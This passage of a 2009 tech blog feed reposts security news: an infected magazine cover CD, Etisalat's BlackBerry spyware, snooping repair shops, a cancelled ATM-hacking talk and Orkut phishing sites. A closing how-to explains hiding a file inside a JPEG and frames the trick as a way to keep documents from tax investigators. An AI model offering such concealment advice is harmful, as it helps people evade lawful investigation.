<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">Springer-Verlag, the publishers of ComputerBild, have reportedly contacted independent experts at AV-Test.org who have confirmed the infection.</div>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">ComputerBild has published a statement to its readers (in German), warning of the infection and providing a link to a clean, uninfected version of the program.</div>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px;">The good news is that W32/Induc-A appears to be a proof-of-concept virus and has no malicious payload other than spreading &#8211; nevertheless, no-one wants unauthorised hacker&#8217;s code running on their computer.</div>
<p>According to German media reports, a popular computer magazine is on sale in the country containing a copy of the W32/Induc-A Delphi virus on its free cover CD ROM.</p>
<p>The 18/2009 edition of ComputerBild, one of Germany&#8217;s biggest computer magazines with an estimated readership of over 4 million people, carries an infected copy of TidyFavorites 4.1, a tool used to help you organise your browser&#8217;s list of favourite websites, on its cover CD.</p>
<p>Springer-Verlag, the publishers of ComputerBild, have reportedly contacted independent experts at AV-Test.org who have confirmed the infection.</p>
<p>ComputerBild has published a statement to its readers (in German), warning of the infection and providing a link to a clean, uninfected version of the program.</p>
<p>The good news is that W32/Induc-A appears to be a proof-of-concept virus and has no malicious payload other than spreading &#8211; nevertheless, no-one wants unauthorised hacker&#8217;s code running on their computer.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/09/01/virus-magazine-ships-induc-delphi-virus-on-cover-cd-rom/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SPY : Did Etisalat Spied BlackBerry Customers?</title>
		<link>http://techblog.cyberphunkz.com/2009/07/24/spy-did-etisalat-spied-blackberry-customers/</link>
		<comments>http://techblog.cyberphunkz.com/2009/07/24/spy-did-etisalat-spied-blackberry-customers/#comments</comments>
		<pubDate>Fri, 24 Jul 2009 14:58:28 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Geek]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Blackberry]]></category>
		<category><![CDATA[etisalat]]></category>
		<category><![CDATA[spy]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=324</guid>
		<description><![CDATA[BlackBerry customers revolt after spyware scandal If your customers think that you tried to spy on them, that&#8217;s not going to be good for business. 23 July 2009 http://www.sophos.com/blogs/gc/g/2009/07/23/blackberry-customers-revolt-after-spyware-scandal/ That&#8217;s the message that&#8217;s presumably being heard loud-and-clear by telecoms company Etisalat, which has found itself in the middle of a storm of negative headlines after &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/07/24/spy-did-etisalat-spied-blackberry-customers/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em><span style="font-size: 11pt; color: maroon;">BlackBerry customers revolt after spyware scandal</span></em></strong></p>
<p><strong><em><span style="font-size: 11pt; color: maroon;">If your customers think that you tried to spy on them, that&#8217;s not going to be good for business.</span></em></strong></p>
<p><span style="font-size: 11pt;">23 July 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://www.sophos.com/blogs/gc/g/2009/07/23/blackberry-customers-revolt-after-spyware-scandal/" target="_blank">http://www.sophos.com/blogs/gc/g/2009/07/23/blackberry-customers-revolt-after-spyware-scandal/</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">That&#8217;s the message that&#8217;s presumably being heard loud-and-clear by telecoms company Etisalat, which has found itself in the middle of a storm of negative headlines after it was revealed that an update it sent to BlackBerry users in the United Arab Emirates, which claimed to improve performance of the mobile device, was actually spying on them.</span></p>
<p><span style="font-size: 11pt;"><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">RIM, makers of the Blackberry smartphone beloved by businesspeople around the world, say that the spyware update sent out by Etisalat actually worsened battery life and reception, and (most worryingly) was designed to &#8220;to send received messages back to a central server.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">Potentially, the patch gave Etisalat the ability to read any emails and text messages sent from their customers&#8217; BlackBerry devices.</span></p>
<p><span style="font-size: 11pt; color: maroon;"><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Now, an online survey conducted by the Arabian Business website reveals that more than 50% of Etisalat&#8217;s BlackBerry customers are planning to ditch the UAE telecoms provider in the wake of the spyware. It&#8217;s hard not to feel sympathetic with those aggrieved customers. After all, as Erin Andrews just demonstrated, no-one likes to be watched without their knowledge.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-324"></span><br />
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">Curiously, the offending patch appears to have been written by a US-based company called SS8, who develop electronic surveillance solutions for intelligence agencies.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Quite why Etisalat may have wanted to distribute a spyware update to monitor its customers is still unclear. So far they have declined to comment on the claims of spyware, restricting their public comment on the matter to the following statement:</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;">Etisalat today confirmed that a conflict in the settings in some BlackBerry devices has led to a slight technical fault while upgrading the software of these devices.</span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;"> </span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;">This has resulted in reduced battery life in a very limited number of devices. Etisalat has received approximately 300 complaints to date, out of its total customer base which exceeds 145,000.</span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;"> </span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;">These upgrades were required for service enhancements particularly for issues identified related to the handover between 2G to 3G network coverage areas.</span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;"> </span></em></p>
<p style="margin-left: 36pt;"><em><span style="font-size: 11pt;">Customers who have been affected are advised to call 101 where they will be given instructions on how to restore their handset to its original state. This will resolve the issue completely.</span></em></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">RIM has published an update which removes the application from affected BlackBerry smartphones.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/07/24/spy-did-etisalat-spied-blackberry-customers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Repair Shops Hack Your Laptops</title>
		<link>http://techblog.cyberphunkz.com/2009/07/14/repair-shops-hack-your-laptops/</link>
		<comments>http://techblog.cyberphunkz.com/2009/07/14/repair-shops-hack-your-laptops/#comments</comments>
		<pubDate>Tue, 14 Jul 2009 14:55:35 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[laptop]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[repair shops]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=322</guid>
		<description><![CDATA[Mark White, home affairs correspondent http://news.sky.com/skynews/Home/UK-News/Sky-News-Undercover-Laptop-Investigation-Repair-Shops-Caught-Hacking-Into-Personal-Files/Article/200907315343387?lpos=UK_News_Top_Stories_Header_0&#38;lid=ARTICLE_15343387_Sky_News_Undercover_Laptop_Investigation%3A_R Some computer repair shops are illegally accessing personal data on customers&#8217; hard drives &#8211; and even trying to hack their bank accounts, a Sky News investigation has found. In one case, passwords, log-in details and holiday photographs were all copied onto a portable memory stick by a technician. In &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/07/14/repair-shops-hack-your-laptops/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 15px;">Mark White, home affairs correspondent</span></p>
<p><span style="font-size: 11pt;"><a href="http://news.sky.com/skynews/Home/UK-News/Sky-News-Undercover-Laptop-Investigation-Repair-Shops-Caught-Hacking-Into-Personal-Files/Article/200907315343387?lpos=UK_News_Top_Stories_Header_0&amp;lid=ARTICLE_15343387_Sky_News_Undercover_Laptop_Investigation%3A_R" target="_blank">http://news.sky.com/skynews/Home/UK-News/Sky-News-Undercover-Laptop-Investigation-Repair-Shops-Caught-Hacking-Into-Personal-Files/Article/200907315343387?lpos=UK_News_Top_Stories_Header_0&amp;lid=ARTICLE_15343387_Sky_News_Undercover_Laptop_Investigation%3A_R</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Some computer repair shops are illegally accessing personal data on customers&#8217; hard drives &#8211; and even trying to hack their bank accounts, a Sky News investigation has found.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">In one case, passwords, log-in details and holiday photographs were all copied onto a portable memory stick by a technician.</span></p>
<p><span style="font-size: 11pt;"><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">In other shops, customers were charged for non-existent work and simple faults were misdiagnosed.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">An investigator from the Trading Standards Institute said he was &#8220;shocked&#8221; by the findings.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The investigation was carried out using surveillance software loaded onto a brand-new laptop.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">It operated without the user being aware that every event that took place on the computer was being logged.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">All activity on the screen was captured in still images, and the identity of whoever was using the computer was recorded using the laptop&#8217;s built-in camera.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Sky engineers then created a simple, easily diagnosable fault, by loosening the connection of the internal memory chip.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">This prevented Windows being able to load. To get things working again, the chip would simply need to be pushed back into position.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The investigation targeted six different computer repair shops. All but one misdiagnosed or overcharged for the fault.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The most serious offender was Revival Computers in Hammersmith, West London.</span></p>
<p><span style="font-size: 11pt;"><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Shortly after identifying the real fault, an engineer called our undercover reporter to say the computer needed a new motherboard, which would cost £130.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Tests carried out by our internal Sky engineer after the diagnosis revealed there was nothing wrong with it.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The surveillance software then recorded one technician browsing through the files on the hard-drive, including private documents and intimate holiday photos, including some of our researcher in her bikini.</span></p>
<p><span style="font-size: 11pt;"><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-322"></span><br />
</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">As he snooped through the files, he is seen smiling and showing the pictures to another colleague.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Later on in the same shop, a second technician loads up the machine and also looks through the photos, which are inside a folder clearly marked &#8216;private&#8217;.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">He then plugs his own portable memory stick into the laptop and copies files, including passwords and photos, into a folder labelled &#8220;mamma jammas&#8221;.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Inside one of the documents copied to the memory stick was a text file containing passwords for Facebook, Hotmail, eBay and a NatWest bank account.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Once the technician had discovered this information, he opened a web browser on the laptop and attempted to log into the back account for around five minutes.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">The only reason he was unsuccessful was because the details were fake.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">When confronted over the findings, staff at Laptop Revival said they did not want to respond to Sky News on camera.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">However in a telephone conversation, they denied all knowledge of the alleged abuses.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">When shown the findings, Richard Webb, an e-commerce investigator for Trading Standards said: &#8220;I&#8217;m really quite shocked, both in the range of potential problems this has revealed &#8211; people overcharging, mis-describing the faults &#8211; but also people attempting to steal personal details.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;It&#8217;s a big abuse of trust. If you were expert in computers you wouldn&#8217;t have to hand in your machine to be repaired. They know that.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;They know you won&#8217;t be able to tell what they&#8217;ve done afterwards, they know you&#8217;re putting your trust in them and unfortunately, as we&#8217;re seeing, there are too many people willing to abuse that trust.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;What you&#8217;ve shown is that there is a much wider problem in the industry than we knew about.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;It suggests we need to look at the area again and we do need to test it like you have done, but with a view of taking criminal enforcement action if these problems are found and evidenced.&#8221;</span></p>
<p><span style="font-size: 11pt;"> </span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/07/14/repair-shops-hack-your-laptops/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Flaw Opens ATMs to Hackers</title>
		<link>http://techblog.cyberphunkz.com/2009/07/11/flaw-opens-atms-to-hackers/</link>
		<comments>http://techblog.cyberphunkz.com/2009/07/11/flaw-opens-atms-to-hackers/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 14:52:15 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[atm]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=320</guid>
		<description><![CDATA[A conference presentation would have exposed flaws in some cash machines. By Robert Lemos July 08, 2009 http://www.technologyreview.com/computing/22966/ Barnaby Jack, a security researcher at the computer networking giant Juniper, had planned to hack into an automatic teller machine (ATM) live onstage at the Black Hat Security Conference in Las Vegas later this month. But his &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/07/11/flaw-opens-atms-to-hackers/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><strong><em><span style="font-size: 11pt; color: maroon;">A conference presentation would have exposed flaws in some cash machines.</span></em></strong></p>
<p><span style="font-size: 11pt;">By Robert Lemos</span></p>
<p><span style="font-size: 11pt;">July 08, 2009</span></p>
<p><span style="font-size: 11pt;"><a href="http://www.technologyreview.com/computing/22966/" target="_blank">http://www.technologyreview.com/computing/22966/</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Barnaby Jack, a security researcher at the computer networking giant Juniper, had planned to hack into an automatic teller machine (ATM) live onstage at the Black Hat Security Conference in Las Vegas later this month. But his presentation, designed to demonstrate the insecurity of various ATMs, attracted the attention of the financial industry as well as security professionals, and under pressure from ATM manufacturers, Juniper canceled the presentation last week, citing concerns that the vulnerabilities involved had still not been fixed.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">&#8220;The vulnerability Barnaby was to discuss has far reaching consequences, not only to the affected ATM vendor, but to other ATM vendors and&#8211;ultimately&#8211;the public,&#8221; wrote Brendan Lewis, director of corporate social media relations for Juniper in a statement posted to the company&#8217;s official blog last week. &#8220;To publicly disclose the research findings before the affected vendor could properly mitigate the exposure would have potentially placed their customers at risk. That is something we don&#8217;t want to see happen.&#8221;</span></p>
<p><span style="font-size: 11pt;"> <span id="more-320"></span><form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
</span></p>
<p><span style="font-size: 11pt;">The presentation would have focused on exploiting vulnerabilities in devices running the Windows CE operating system, including some ATMs, according to a source familiar with the details. While the presentation was canceled to allow manufacturers more time to fix the vulnerabilities, Juniper had originally notified the company almost eight months ago, says the source, who asked not to be named.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Other security experts are not surprised that the vulnerabilities are there to find. Significant flaws in cash machines and ATM networks are plentiful, says Nicholas Percoco, senior vice president of TrustWave, an information security and compliance firm that has assessed the security of point-of-sale terminals, kiosks, and ATM networks. &#8220;It is very, very rare that a device comes to our labs&#8211;in fact, I don&#8217;t think that it has happened&#8211;that we don&#8217;t find a vulnerability,&#8221; Percoco says. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/07/11/flaw-opens-atms-to-hackers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BEWARE : Indian Orkut Accounts Compromised For Phishing</title>
		<link>http://techblog.cyberphunkz.com/2009/07/07/beware-indian-orkut-accounts-compromised-for-phishing/</link>
		<comments>http://techblog.cyberphunkz.com/2009/07/07/beware-indian-orkut-accounts-compromised-for-phishing/#comments</comments>
		<pubDate>Tue, 07 Jul 2009 05:20:06 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[orkut]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=317</guid>
		<description><![CDATA[03-07-2009 http://www.spamfighter.com/News-12663-Indian-Orkut-Accounts-Compromised-For-Phishing.htm   According to McAfee Avert Labs, as Web 2.0-based social networking sites such as Facebook and MySpace increase in popularity, their users too are increasingly proving as convenient attack points for identity scams and other online frauds. Recently, hackers, online scammers and other cyber-criminals have been using Twitter as well to phish off &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/07/07/beware-indian-orkut-accounts-compromised-for-phishing/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: 11pt;">03-07-2009 </span></p>
<p><span style="font-size: 11pt; color: blue;"><a href="http://www.spamfighter.com/News-12663-Indian-Orkut-Accounts-Compromised-For-Phishing.htm" target="_blank">http://www.spamfighter.com/News-12663-Indian-Orkut-Accounts-Compromised-For-Phishing.htm</a></span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">According to McAfee Avert Labs, as Web 2.0-based social networking sites such as Facebook and MySpace increase in popularity, their users too are increasingly proving as convenient attack points for identity scams and other online frauds. Recently, hackers, online scammers and other cyber-criminals have been using Twitter as well to phish off private data from Web surfers.</span></p>
<p><span style="font-size: 11pt;"> <script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;">Aside these websites, another social networking site that cyber-criminals prefer to use is Orkut, which probably represents the most widely visited and popular social networking site across the Indian sub-continent. As a matter of fact, reports state that over 15% of Orkut traffic flows from India.</span></p>
<p><span style="font-size: 11pt;"> <script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</span></p>
<p><span style="font-size: 11pt;">Consequently, phishers have devised a stylish approach i.e. in light of a huge population of Indian users favoring Orkut but being insufficiently tech-savvy, phishers and other online scammers have secured control over their accounts through the act of hijacking the Orkut networking accounts of these India-based users.</span></p>
<p><span style="font-size: 11pt;"> <form method="post" action=""><input type="hidden" name="ip" value="38.107.179.214" /><p><label for="s2email">Your email:</label><br /><input type="text" name="email" id="s2email" value="Enter email address..." size="20" onfocus="if (this.value == 'Enter email address...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter email address...';}" /></p><p><input type="submit" name="subscribe" value="Subscribe" />&nbsp;<input type="submit" name="unsubscribe" value="Unsubscribe" /></p></form>
<span id="more-317"></span></span></p>
<p><span style="font-size: 11pt;">Seemingly, phishers have modified these accounts&#8217; user profiles, connecting them to their different fraudulent (phishing) websites that entice users into revealing their private details.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt; color: maroon;">For instance, these phishing sites could pretend to be Orkut in its adult version. Meanwhile, it is reported that the fake Orkut website on sex-related content named &#8220;Orkut Sex&#8221; has met with ongoing success in enticing numerous Orkut members into feeding personal user identifications into the bogus site. Accordingly, when these identification details come into the hands of scammers, the latter use them to harvest other private details of the users and subsequently make illegal money transfers.</span></p>
<p><span style="font-size: 11pt; color: maroon;"> </span></p>
<p><strong><span style="font-size: 11pt; color: maroon;">McAfee Avert Labs, meanwhile, has observed an array of phishing sites related to Orkut namely <a href="http://orkutst/" target="_blank">http://orkutst</a>[blocked].tk, <a href="http://orkutsexlogi/" target="_blank">http://orkutsexlogi</a>[blocked].tk, <a href="http://priya/" target="_blank">http://priya</a>[blocked].<a href="http://freehostia.com/" target="_blank">freehostia.com</a>, <a href="http://s3x/" target="_blank">http://s3x</a>[blocked].<a href="http://kilu.de/" target="_blank">kilu.de</a> and <a href="http://album/" target="_blank">http://album</a>[blocked].<a href="http://kilu.de/" target="_blank">kilu.de</a>.</span></strong></p>
<p> </p>
<p><span style="font-size: 11pt;">Thus, security experts at McAfee once again repeat for end-users that they mustn&#8217;t disclose their monetary or any other personal information online, especially on websites such as Orkut. They also reiterate that users must ensure for all protective measures, in place, on their computers, while avoiding all forms of phishing sites.</span></p>
<p><span style="font-size: 11pt;"> </span></p>
<p><span style="font-size: 11pt;">Moreover, users on Orkut, MySpace, Facebook and other social networking sites must make themselves aware of the botherations they might encounter if a malicious spam or phishing attack chases them.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/07/07/beware-indian-orkut-accounts-compromised-for-phishing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Secretly Hide Any File Inside JPG Image File</title>
		<link>http://techblog.cyberphunkz.com/2009/06/15/secretly-hide-any-file-inside-jpg-image-file/</link>
		<comments>http://techblog.cyberphunkz.com/2009/06/15/secretly-hide-any-file-inside-jpg-image-file/#comments</comments>
		<pubDate>Sun, 14 Jun 2009 19:05:35 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Bad Ideas]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Irresponsible Activities]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[al qaeda]]></category>
		<category><![CDATA[ebay]]></category>
		<category><![CDATA[encapsulation]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=295</guid>
		<description><![CDATA[Few months ago , USA Today story claimed that al-Qaeda operatives were sending out encrypted messages by hiding them inside digital photographs [jpg files] on eBay. While the claim was never proved, it is very easy to hide [or embed] any other file[s] inside a JPEG image. You can place video clips, pdf, mp3, Office documents, zipped &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/06/15/secretly-hide-any-file-inside-jpg-image-file/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Few months ago , USA Today story claimed that al-Qaeda operatives were sending out encrypted messages by hiding them inside digital photographs <span style="font-weight: bold;">[jpg files]</span> on eBay.</p>
<p>While the claim was never proved, it is very easy to hide [or embed] any other file[s] inside a JPEG image. You can place <span style="font-weight: bold;">video clips, pdf, mp3, Office documents, zipped files, webpage or any other file format</span> inside a JPEG image.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ad_channel = "blog";
google_ui_features = "rc:10";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=728x90";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>And when a suspecting user [read CIA, FBI] tries to open that jpeg file [with concealed information] in either a photo editing software or as a thumbnail inside Windows Explorer, it would be tough to make out if this camouflaged jpg file is different from any standard jpg image.</p>
<p>Let&#8217;s say you want to hide a confidential PDF document from the tax investigation officers. What you can do is convert that file into a regular jpg image so even if anyone double-clicks this file, all he will see is a preview of the image and nothing else. And when you want to work on the actual PDF, just rename the extension from jpg to pdf.</p>
<p><span style="font-size: 17px;"><span style="font-weight: bold;">Here&#8217;s the full trick:</span></span></p>
<p><span style="font-weight: bold;">Step 1:</span> You will need two files &#8211; the file you want to hide and one jpg image &#8211; it can be of any size or dimensions. [If you want to hide multiple files in one jpeg image, just zip them into one file]</p>
<p><span style="font-weight: bold;">Step 2:</span> Copy the above two files to the C: folder and open the command prompt window.</p>
<p><span style="font-weight: bold;">Step 3:</span> Move to the c: root by typing cd \ [if the files are in another folder, you'll have to change the prompt to that folder]</p>
<p><span style="font-weight: bold;">Step 4:</span> The most important step &#8211; type the following command:</p>
<blockquote><p>copy /b myimage.jpg + filetohide.pdf my_new_image.jpg</p></blockquote>
<p>To recover the original PDF file, just rename my_new_image.jpg to filename.pdf.</p>
<p>Here we illustrated with an pdf file as that works with simple renaming. If you want to apply this technique to other file formats like XLS, DOC, PPT, AVI, WMV, WAV, SWF, etc, you may have to first compress them in RAR format before executing the copy /b DOS command.</p>
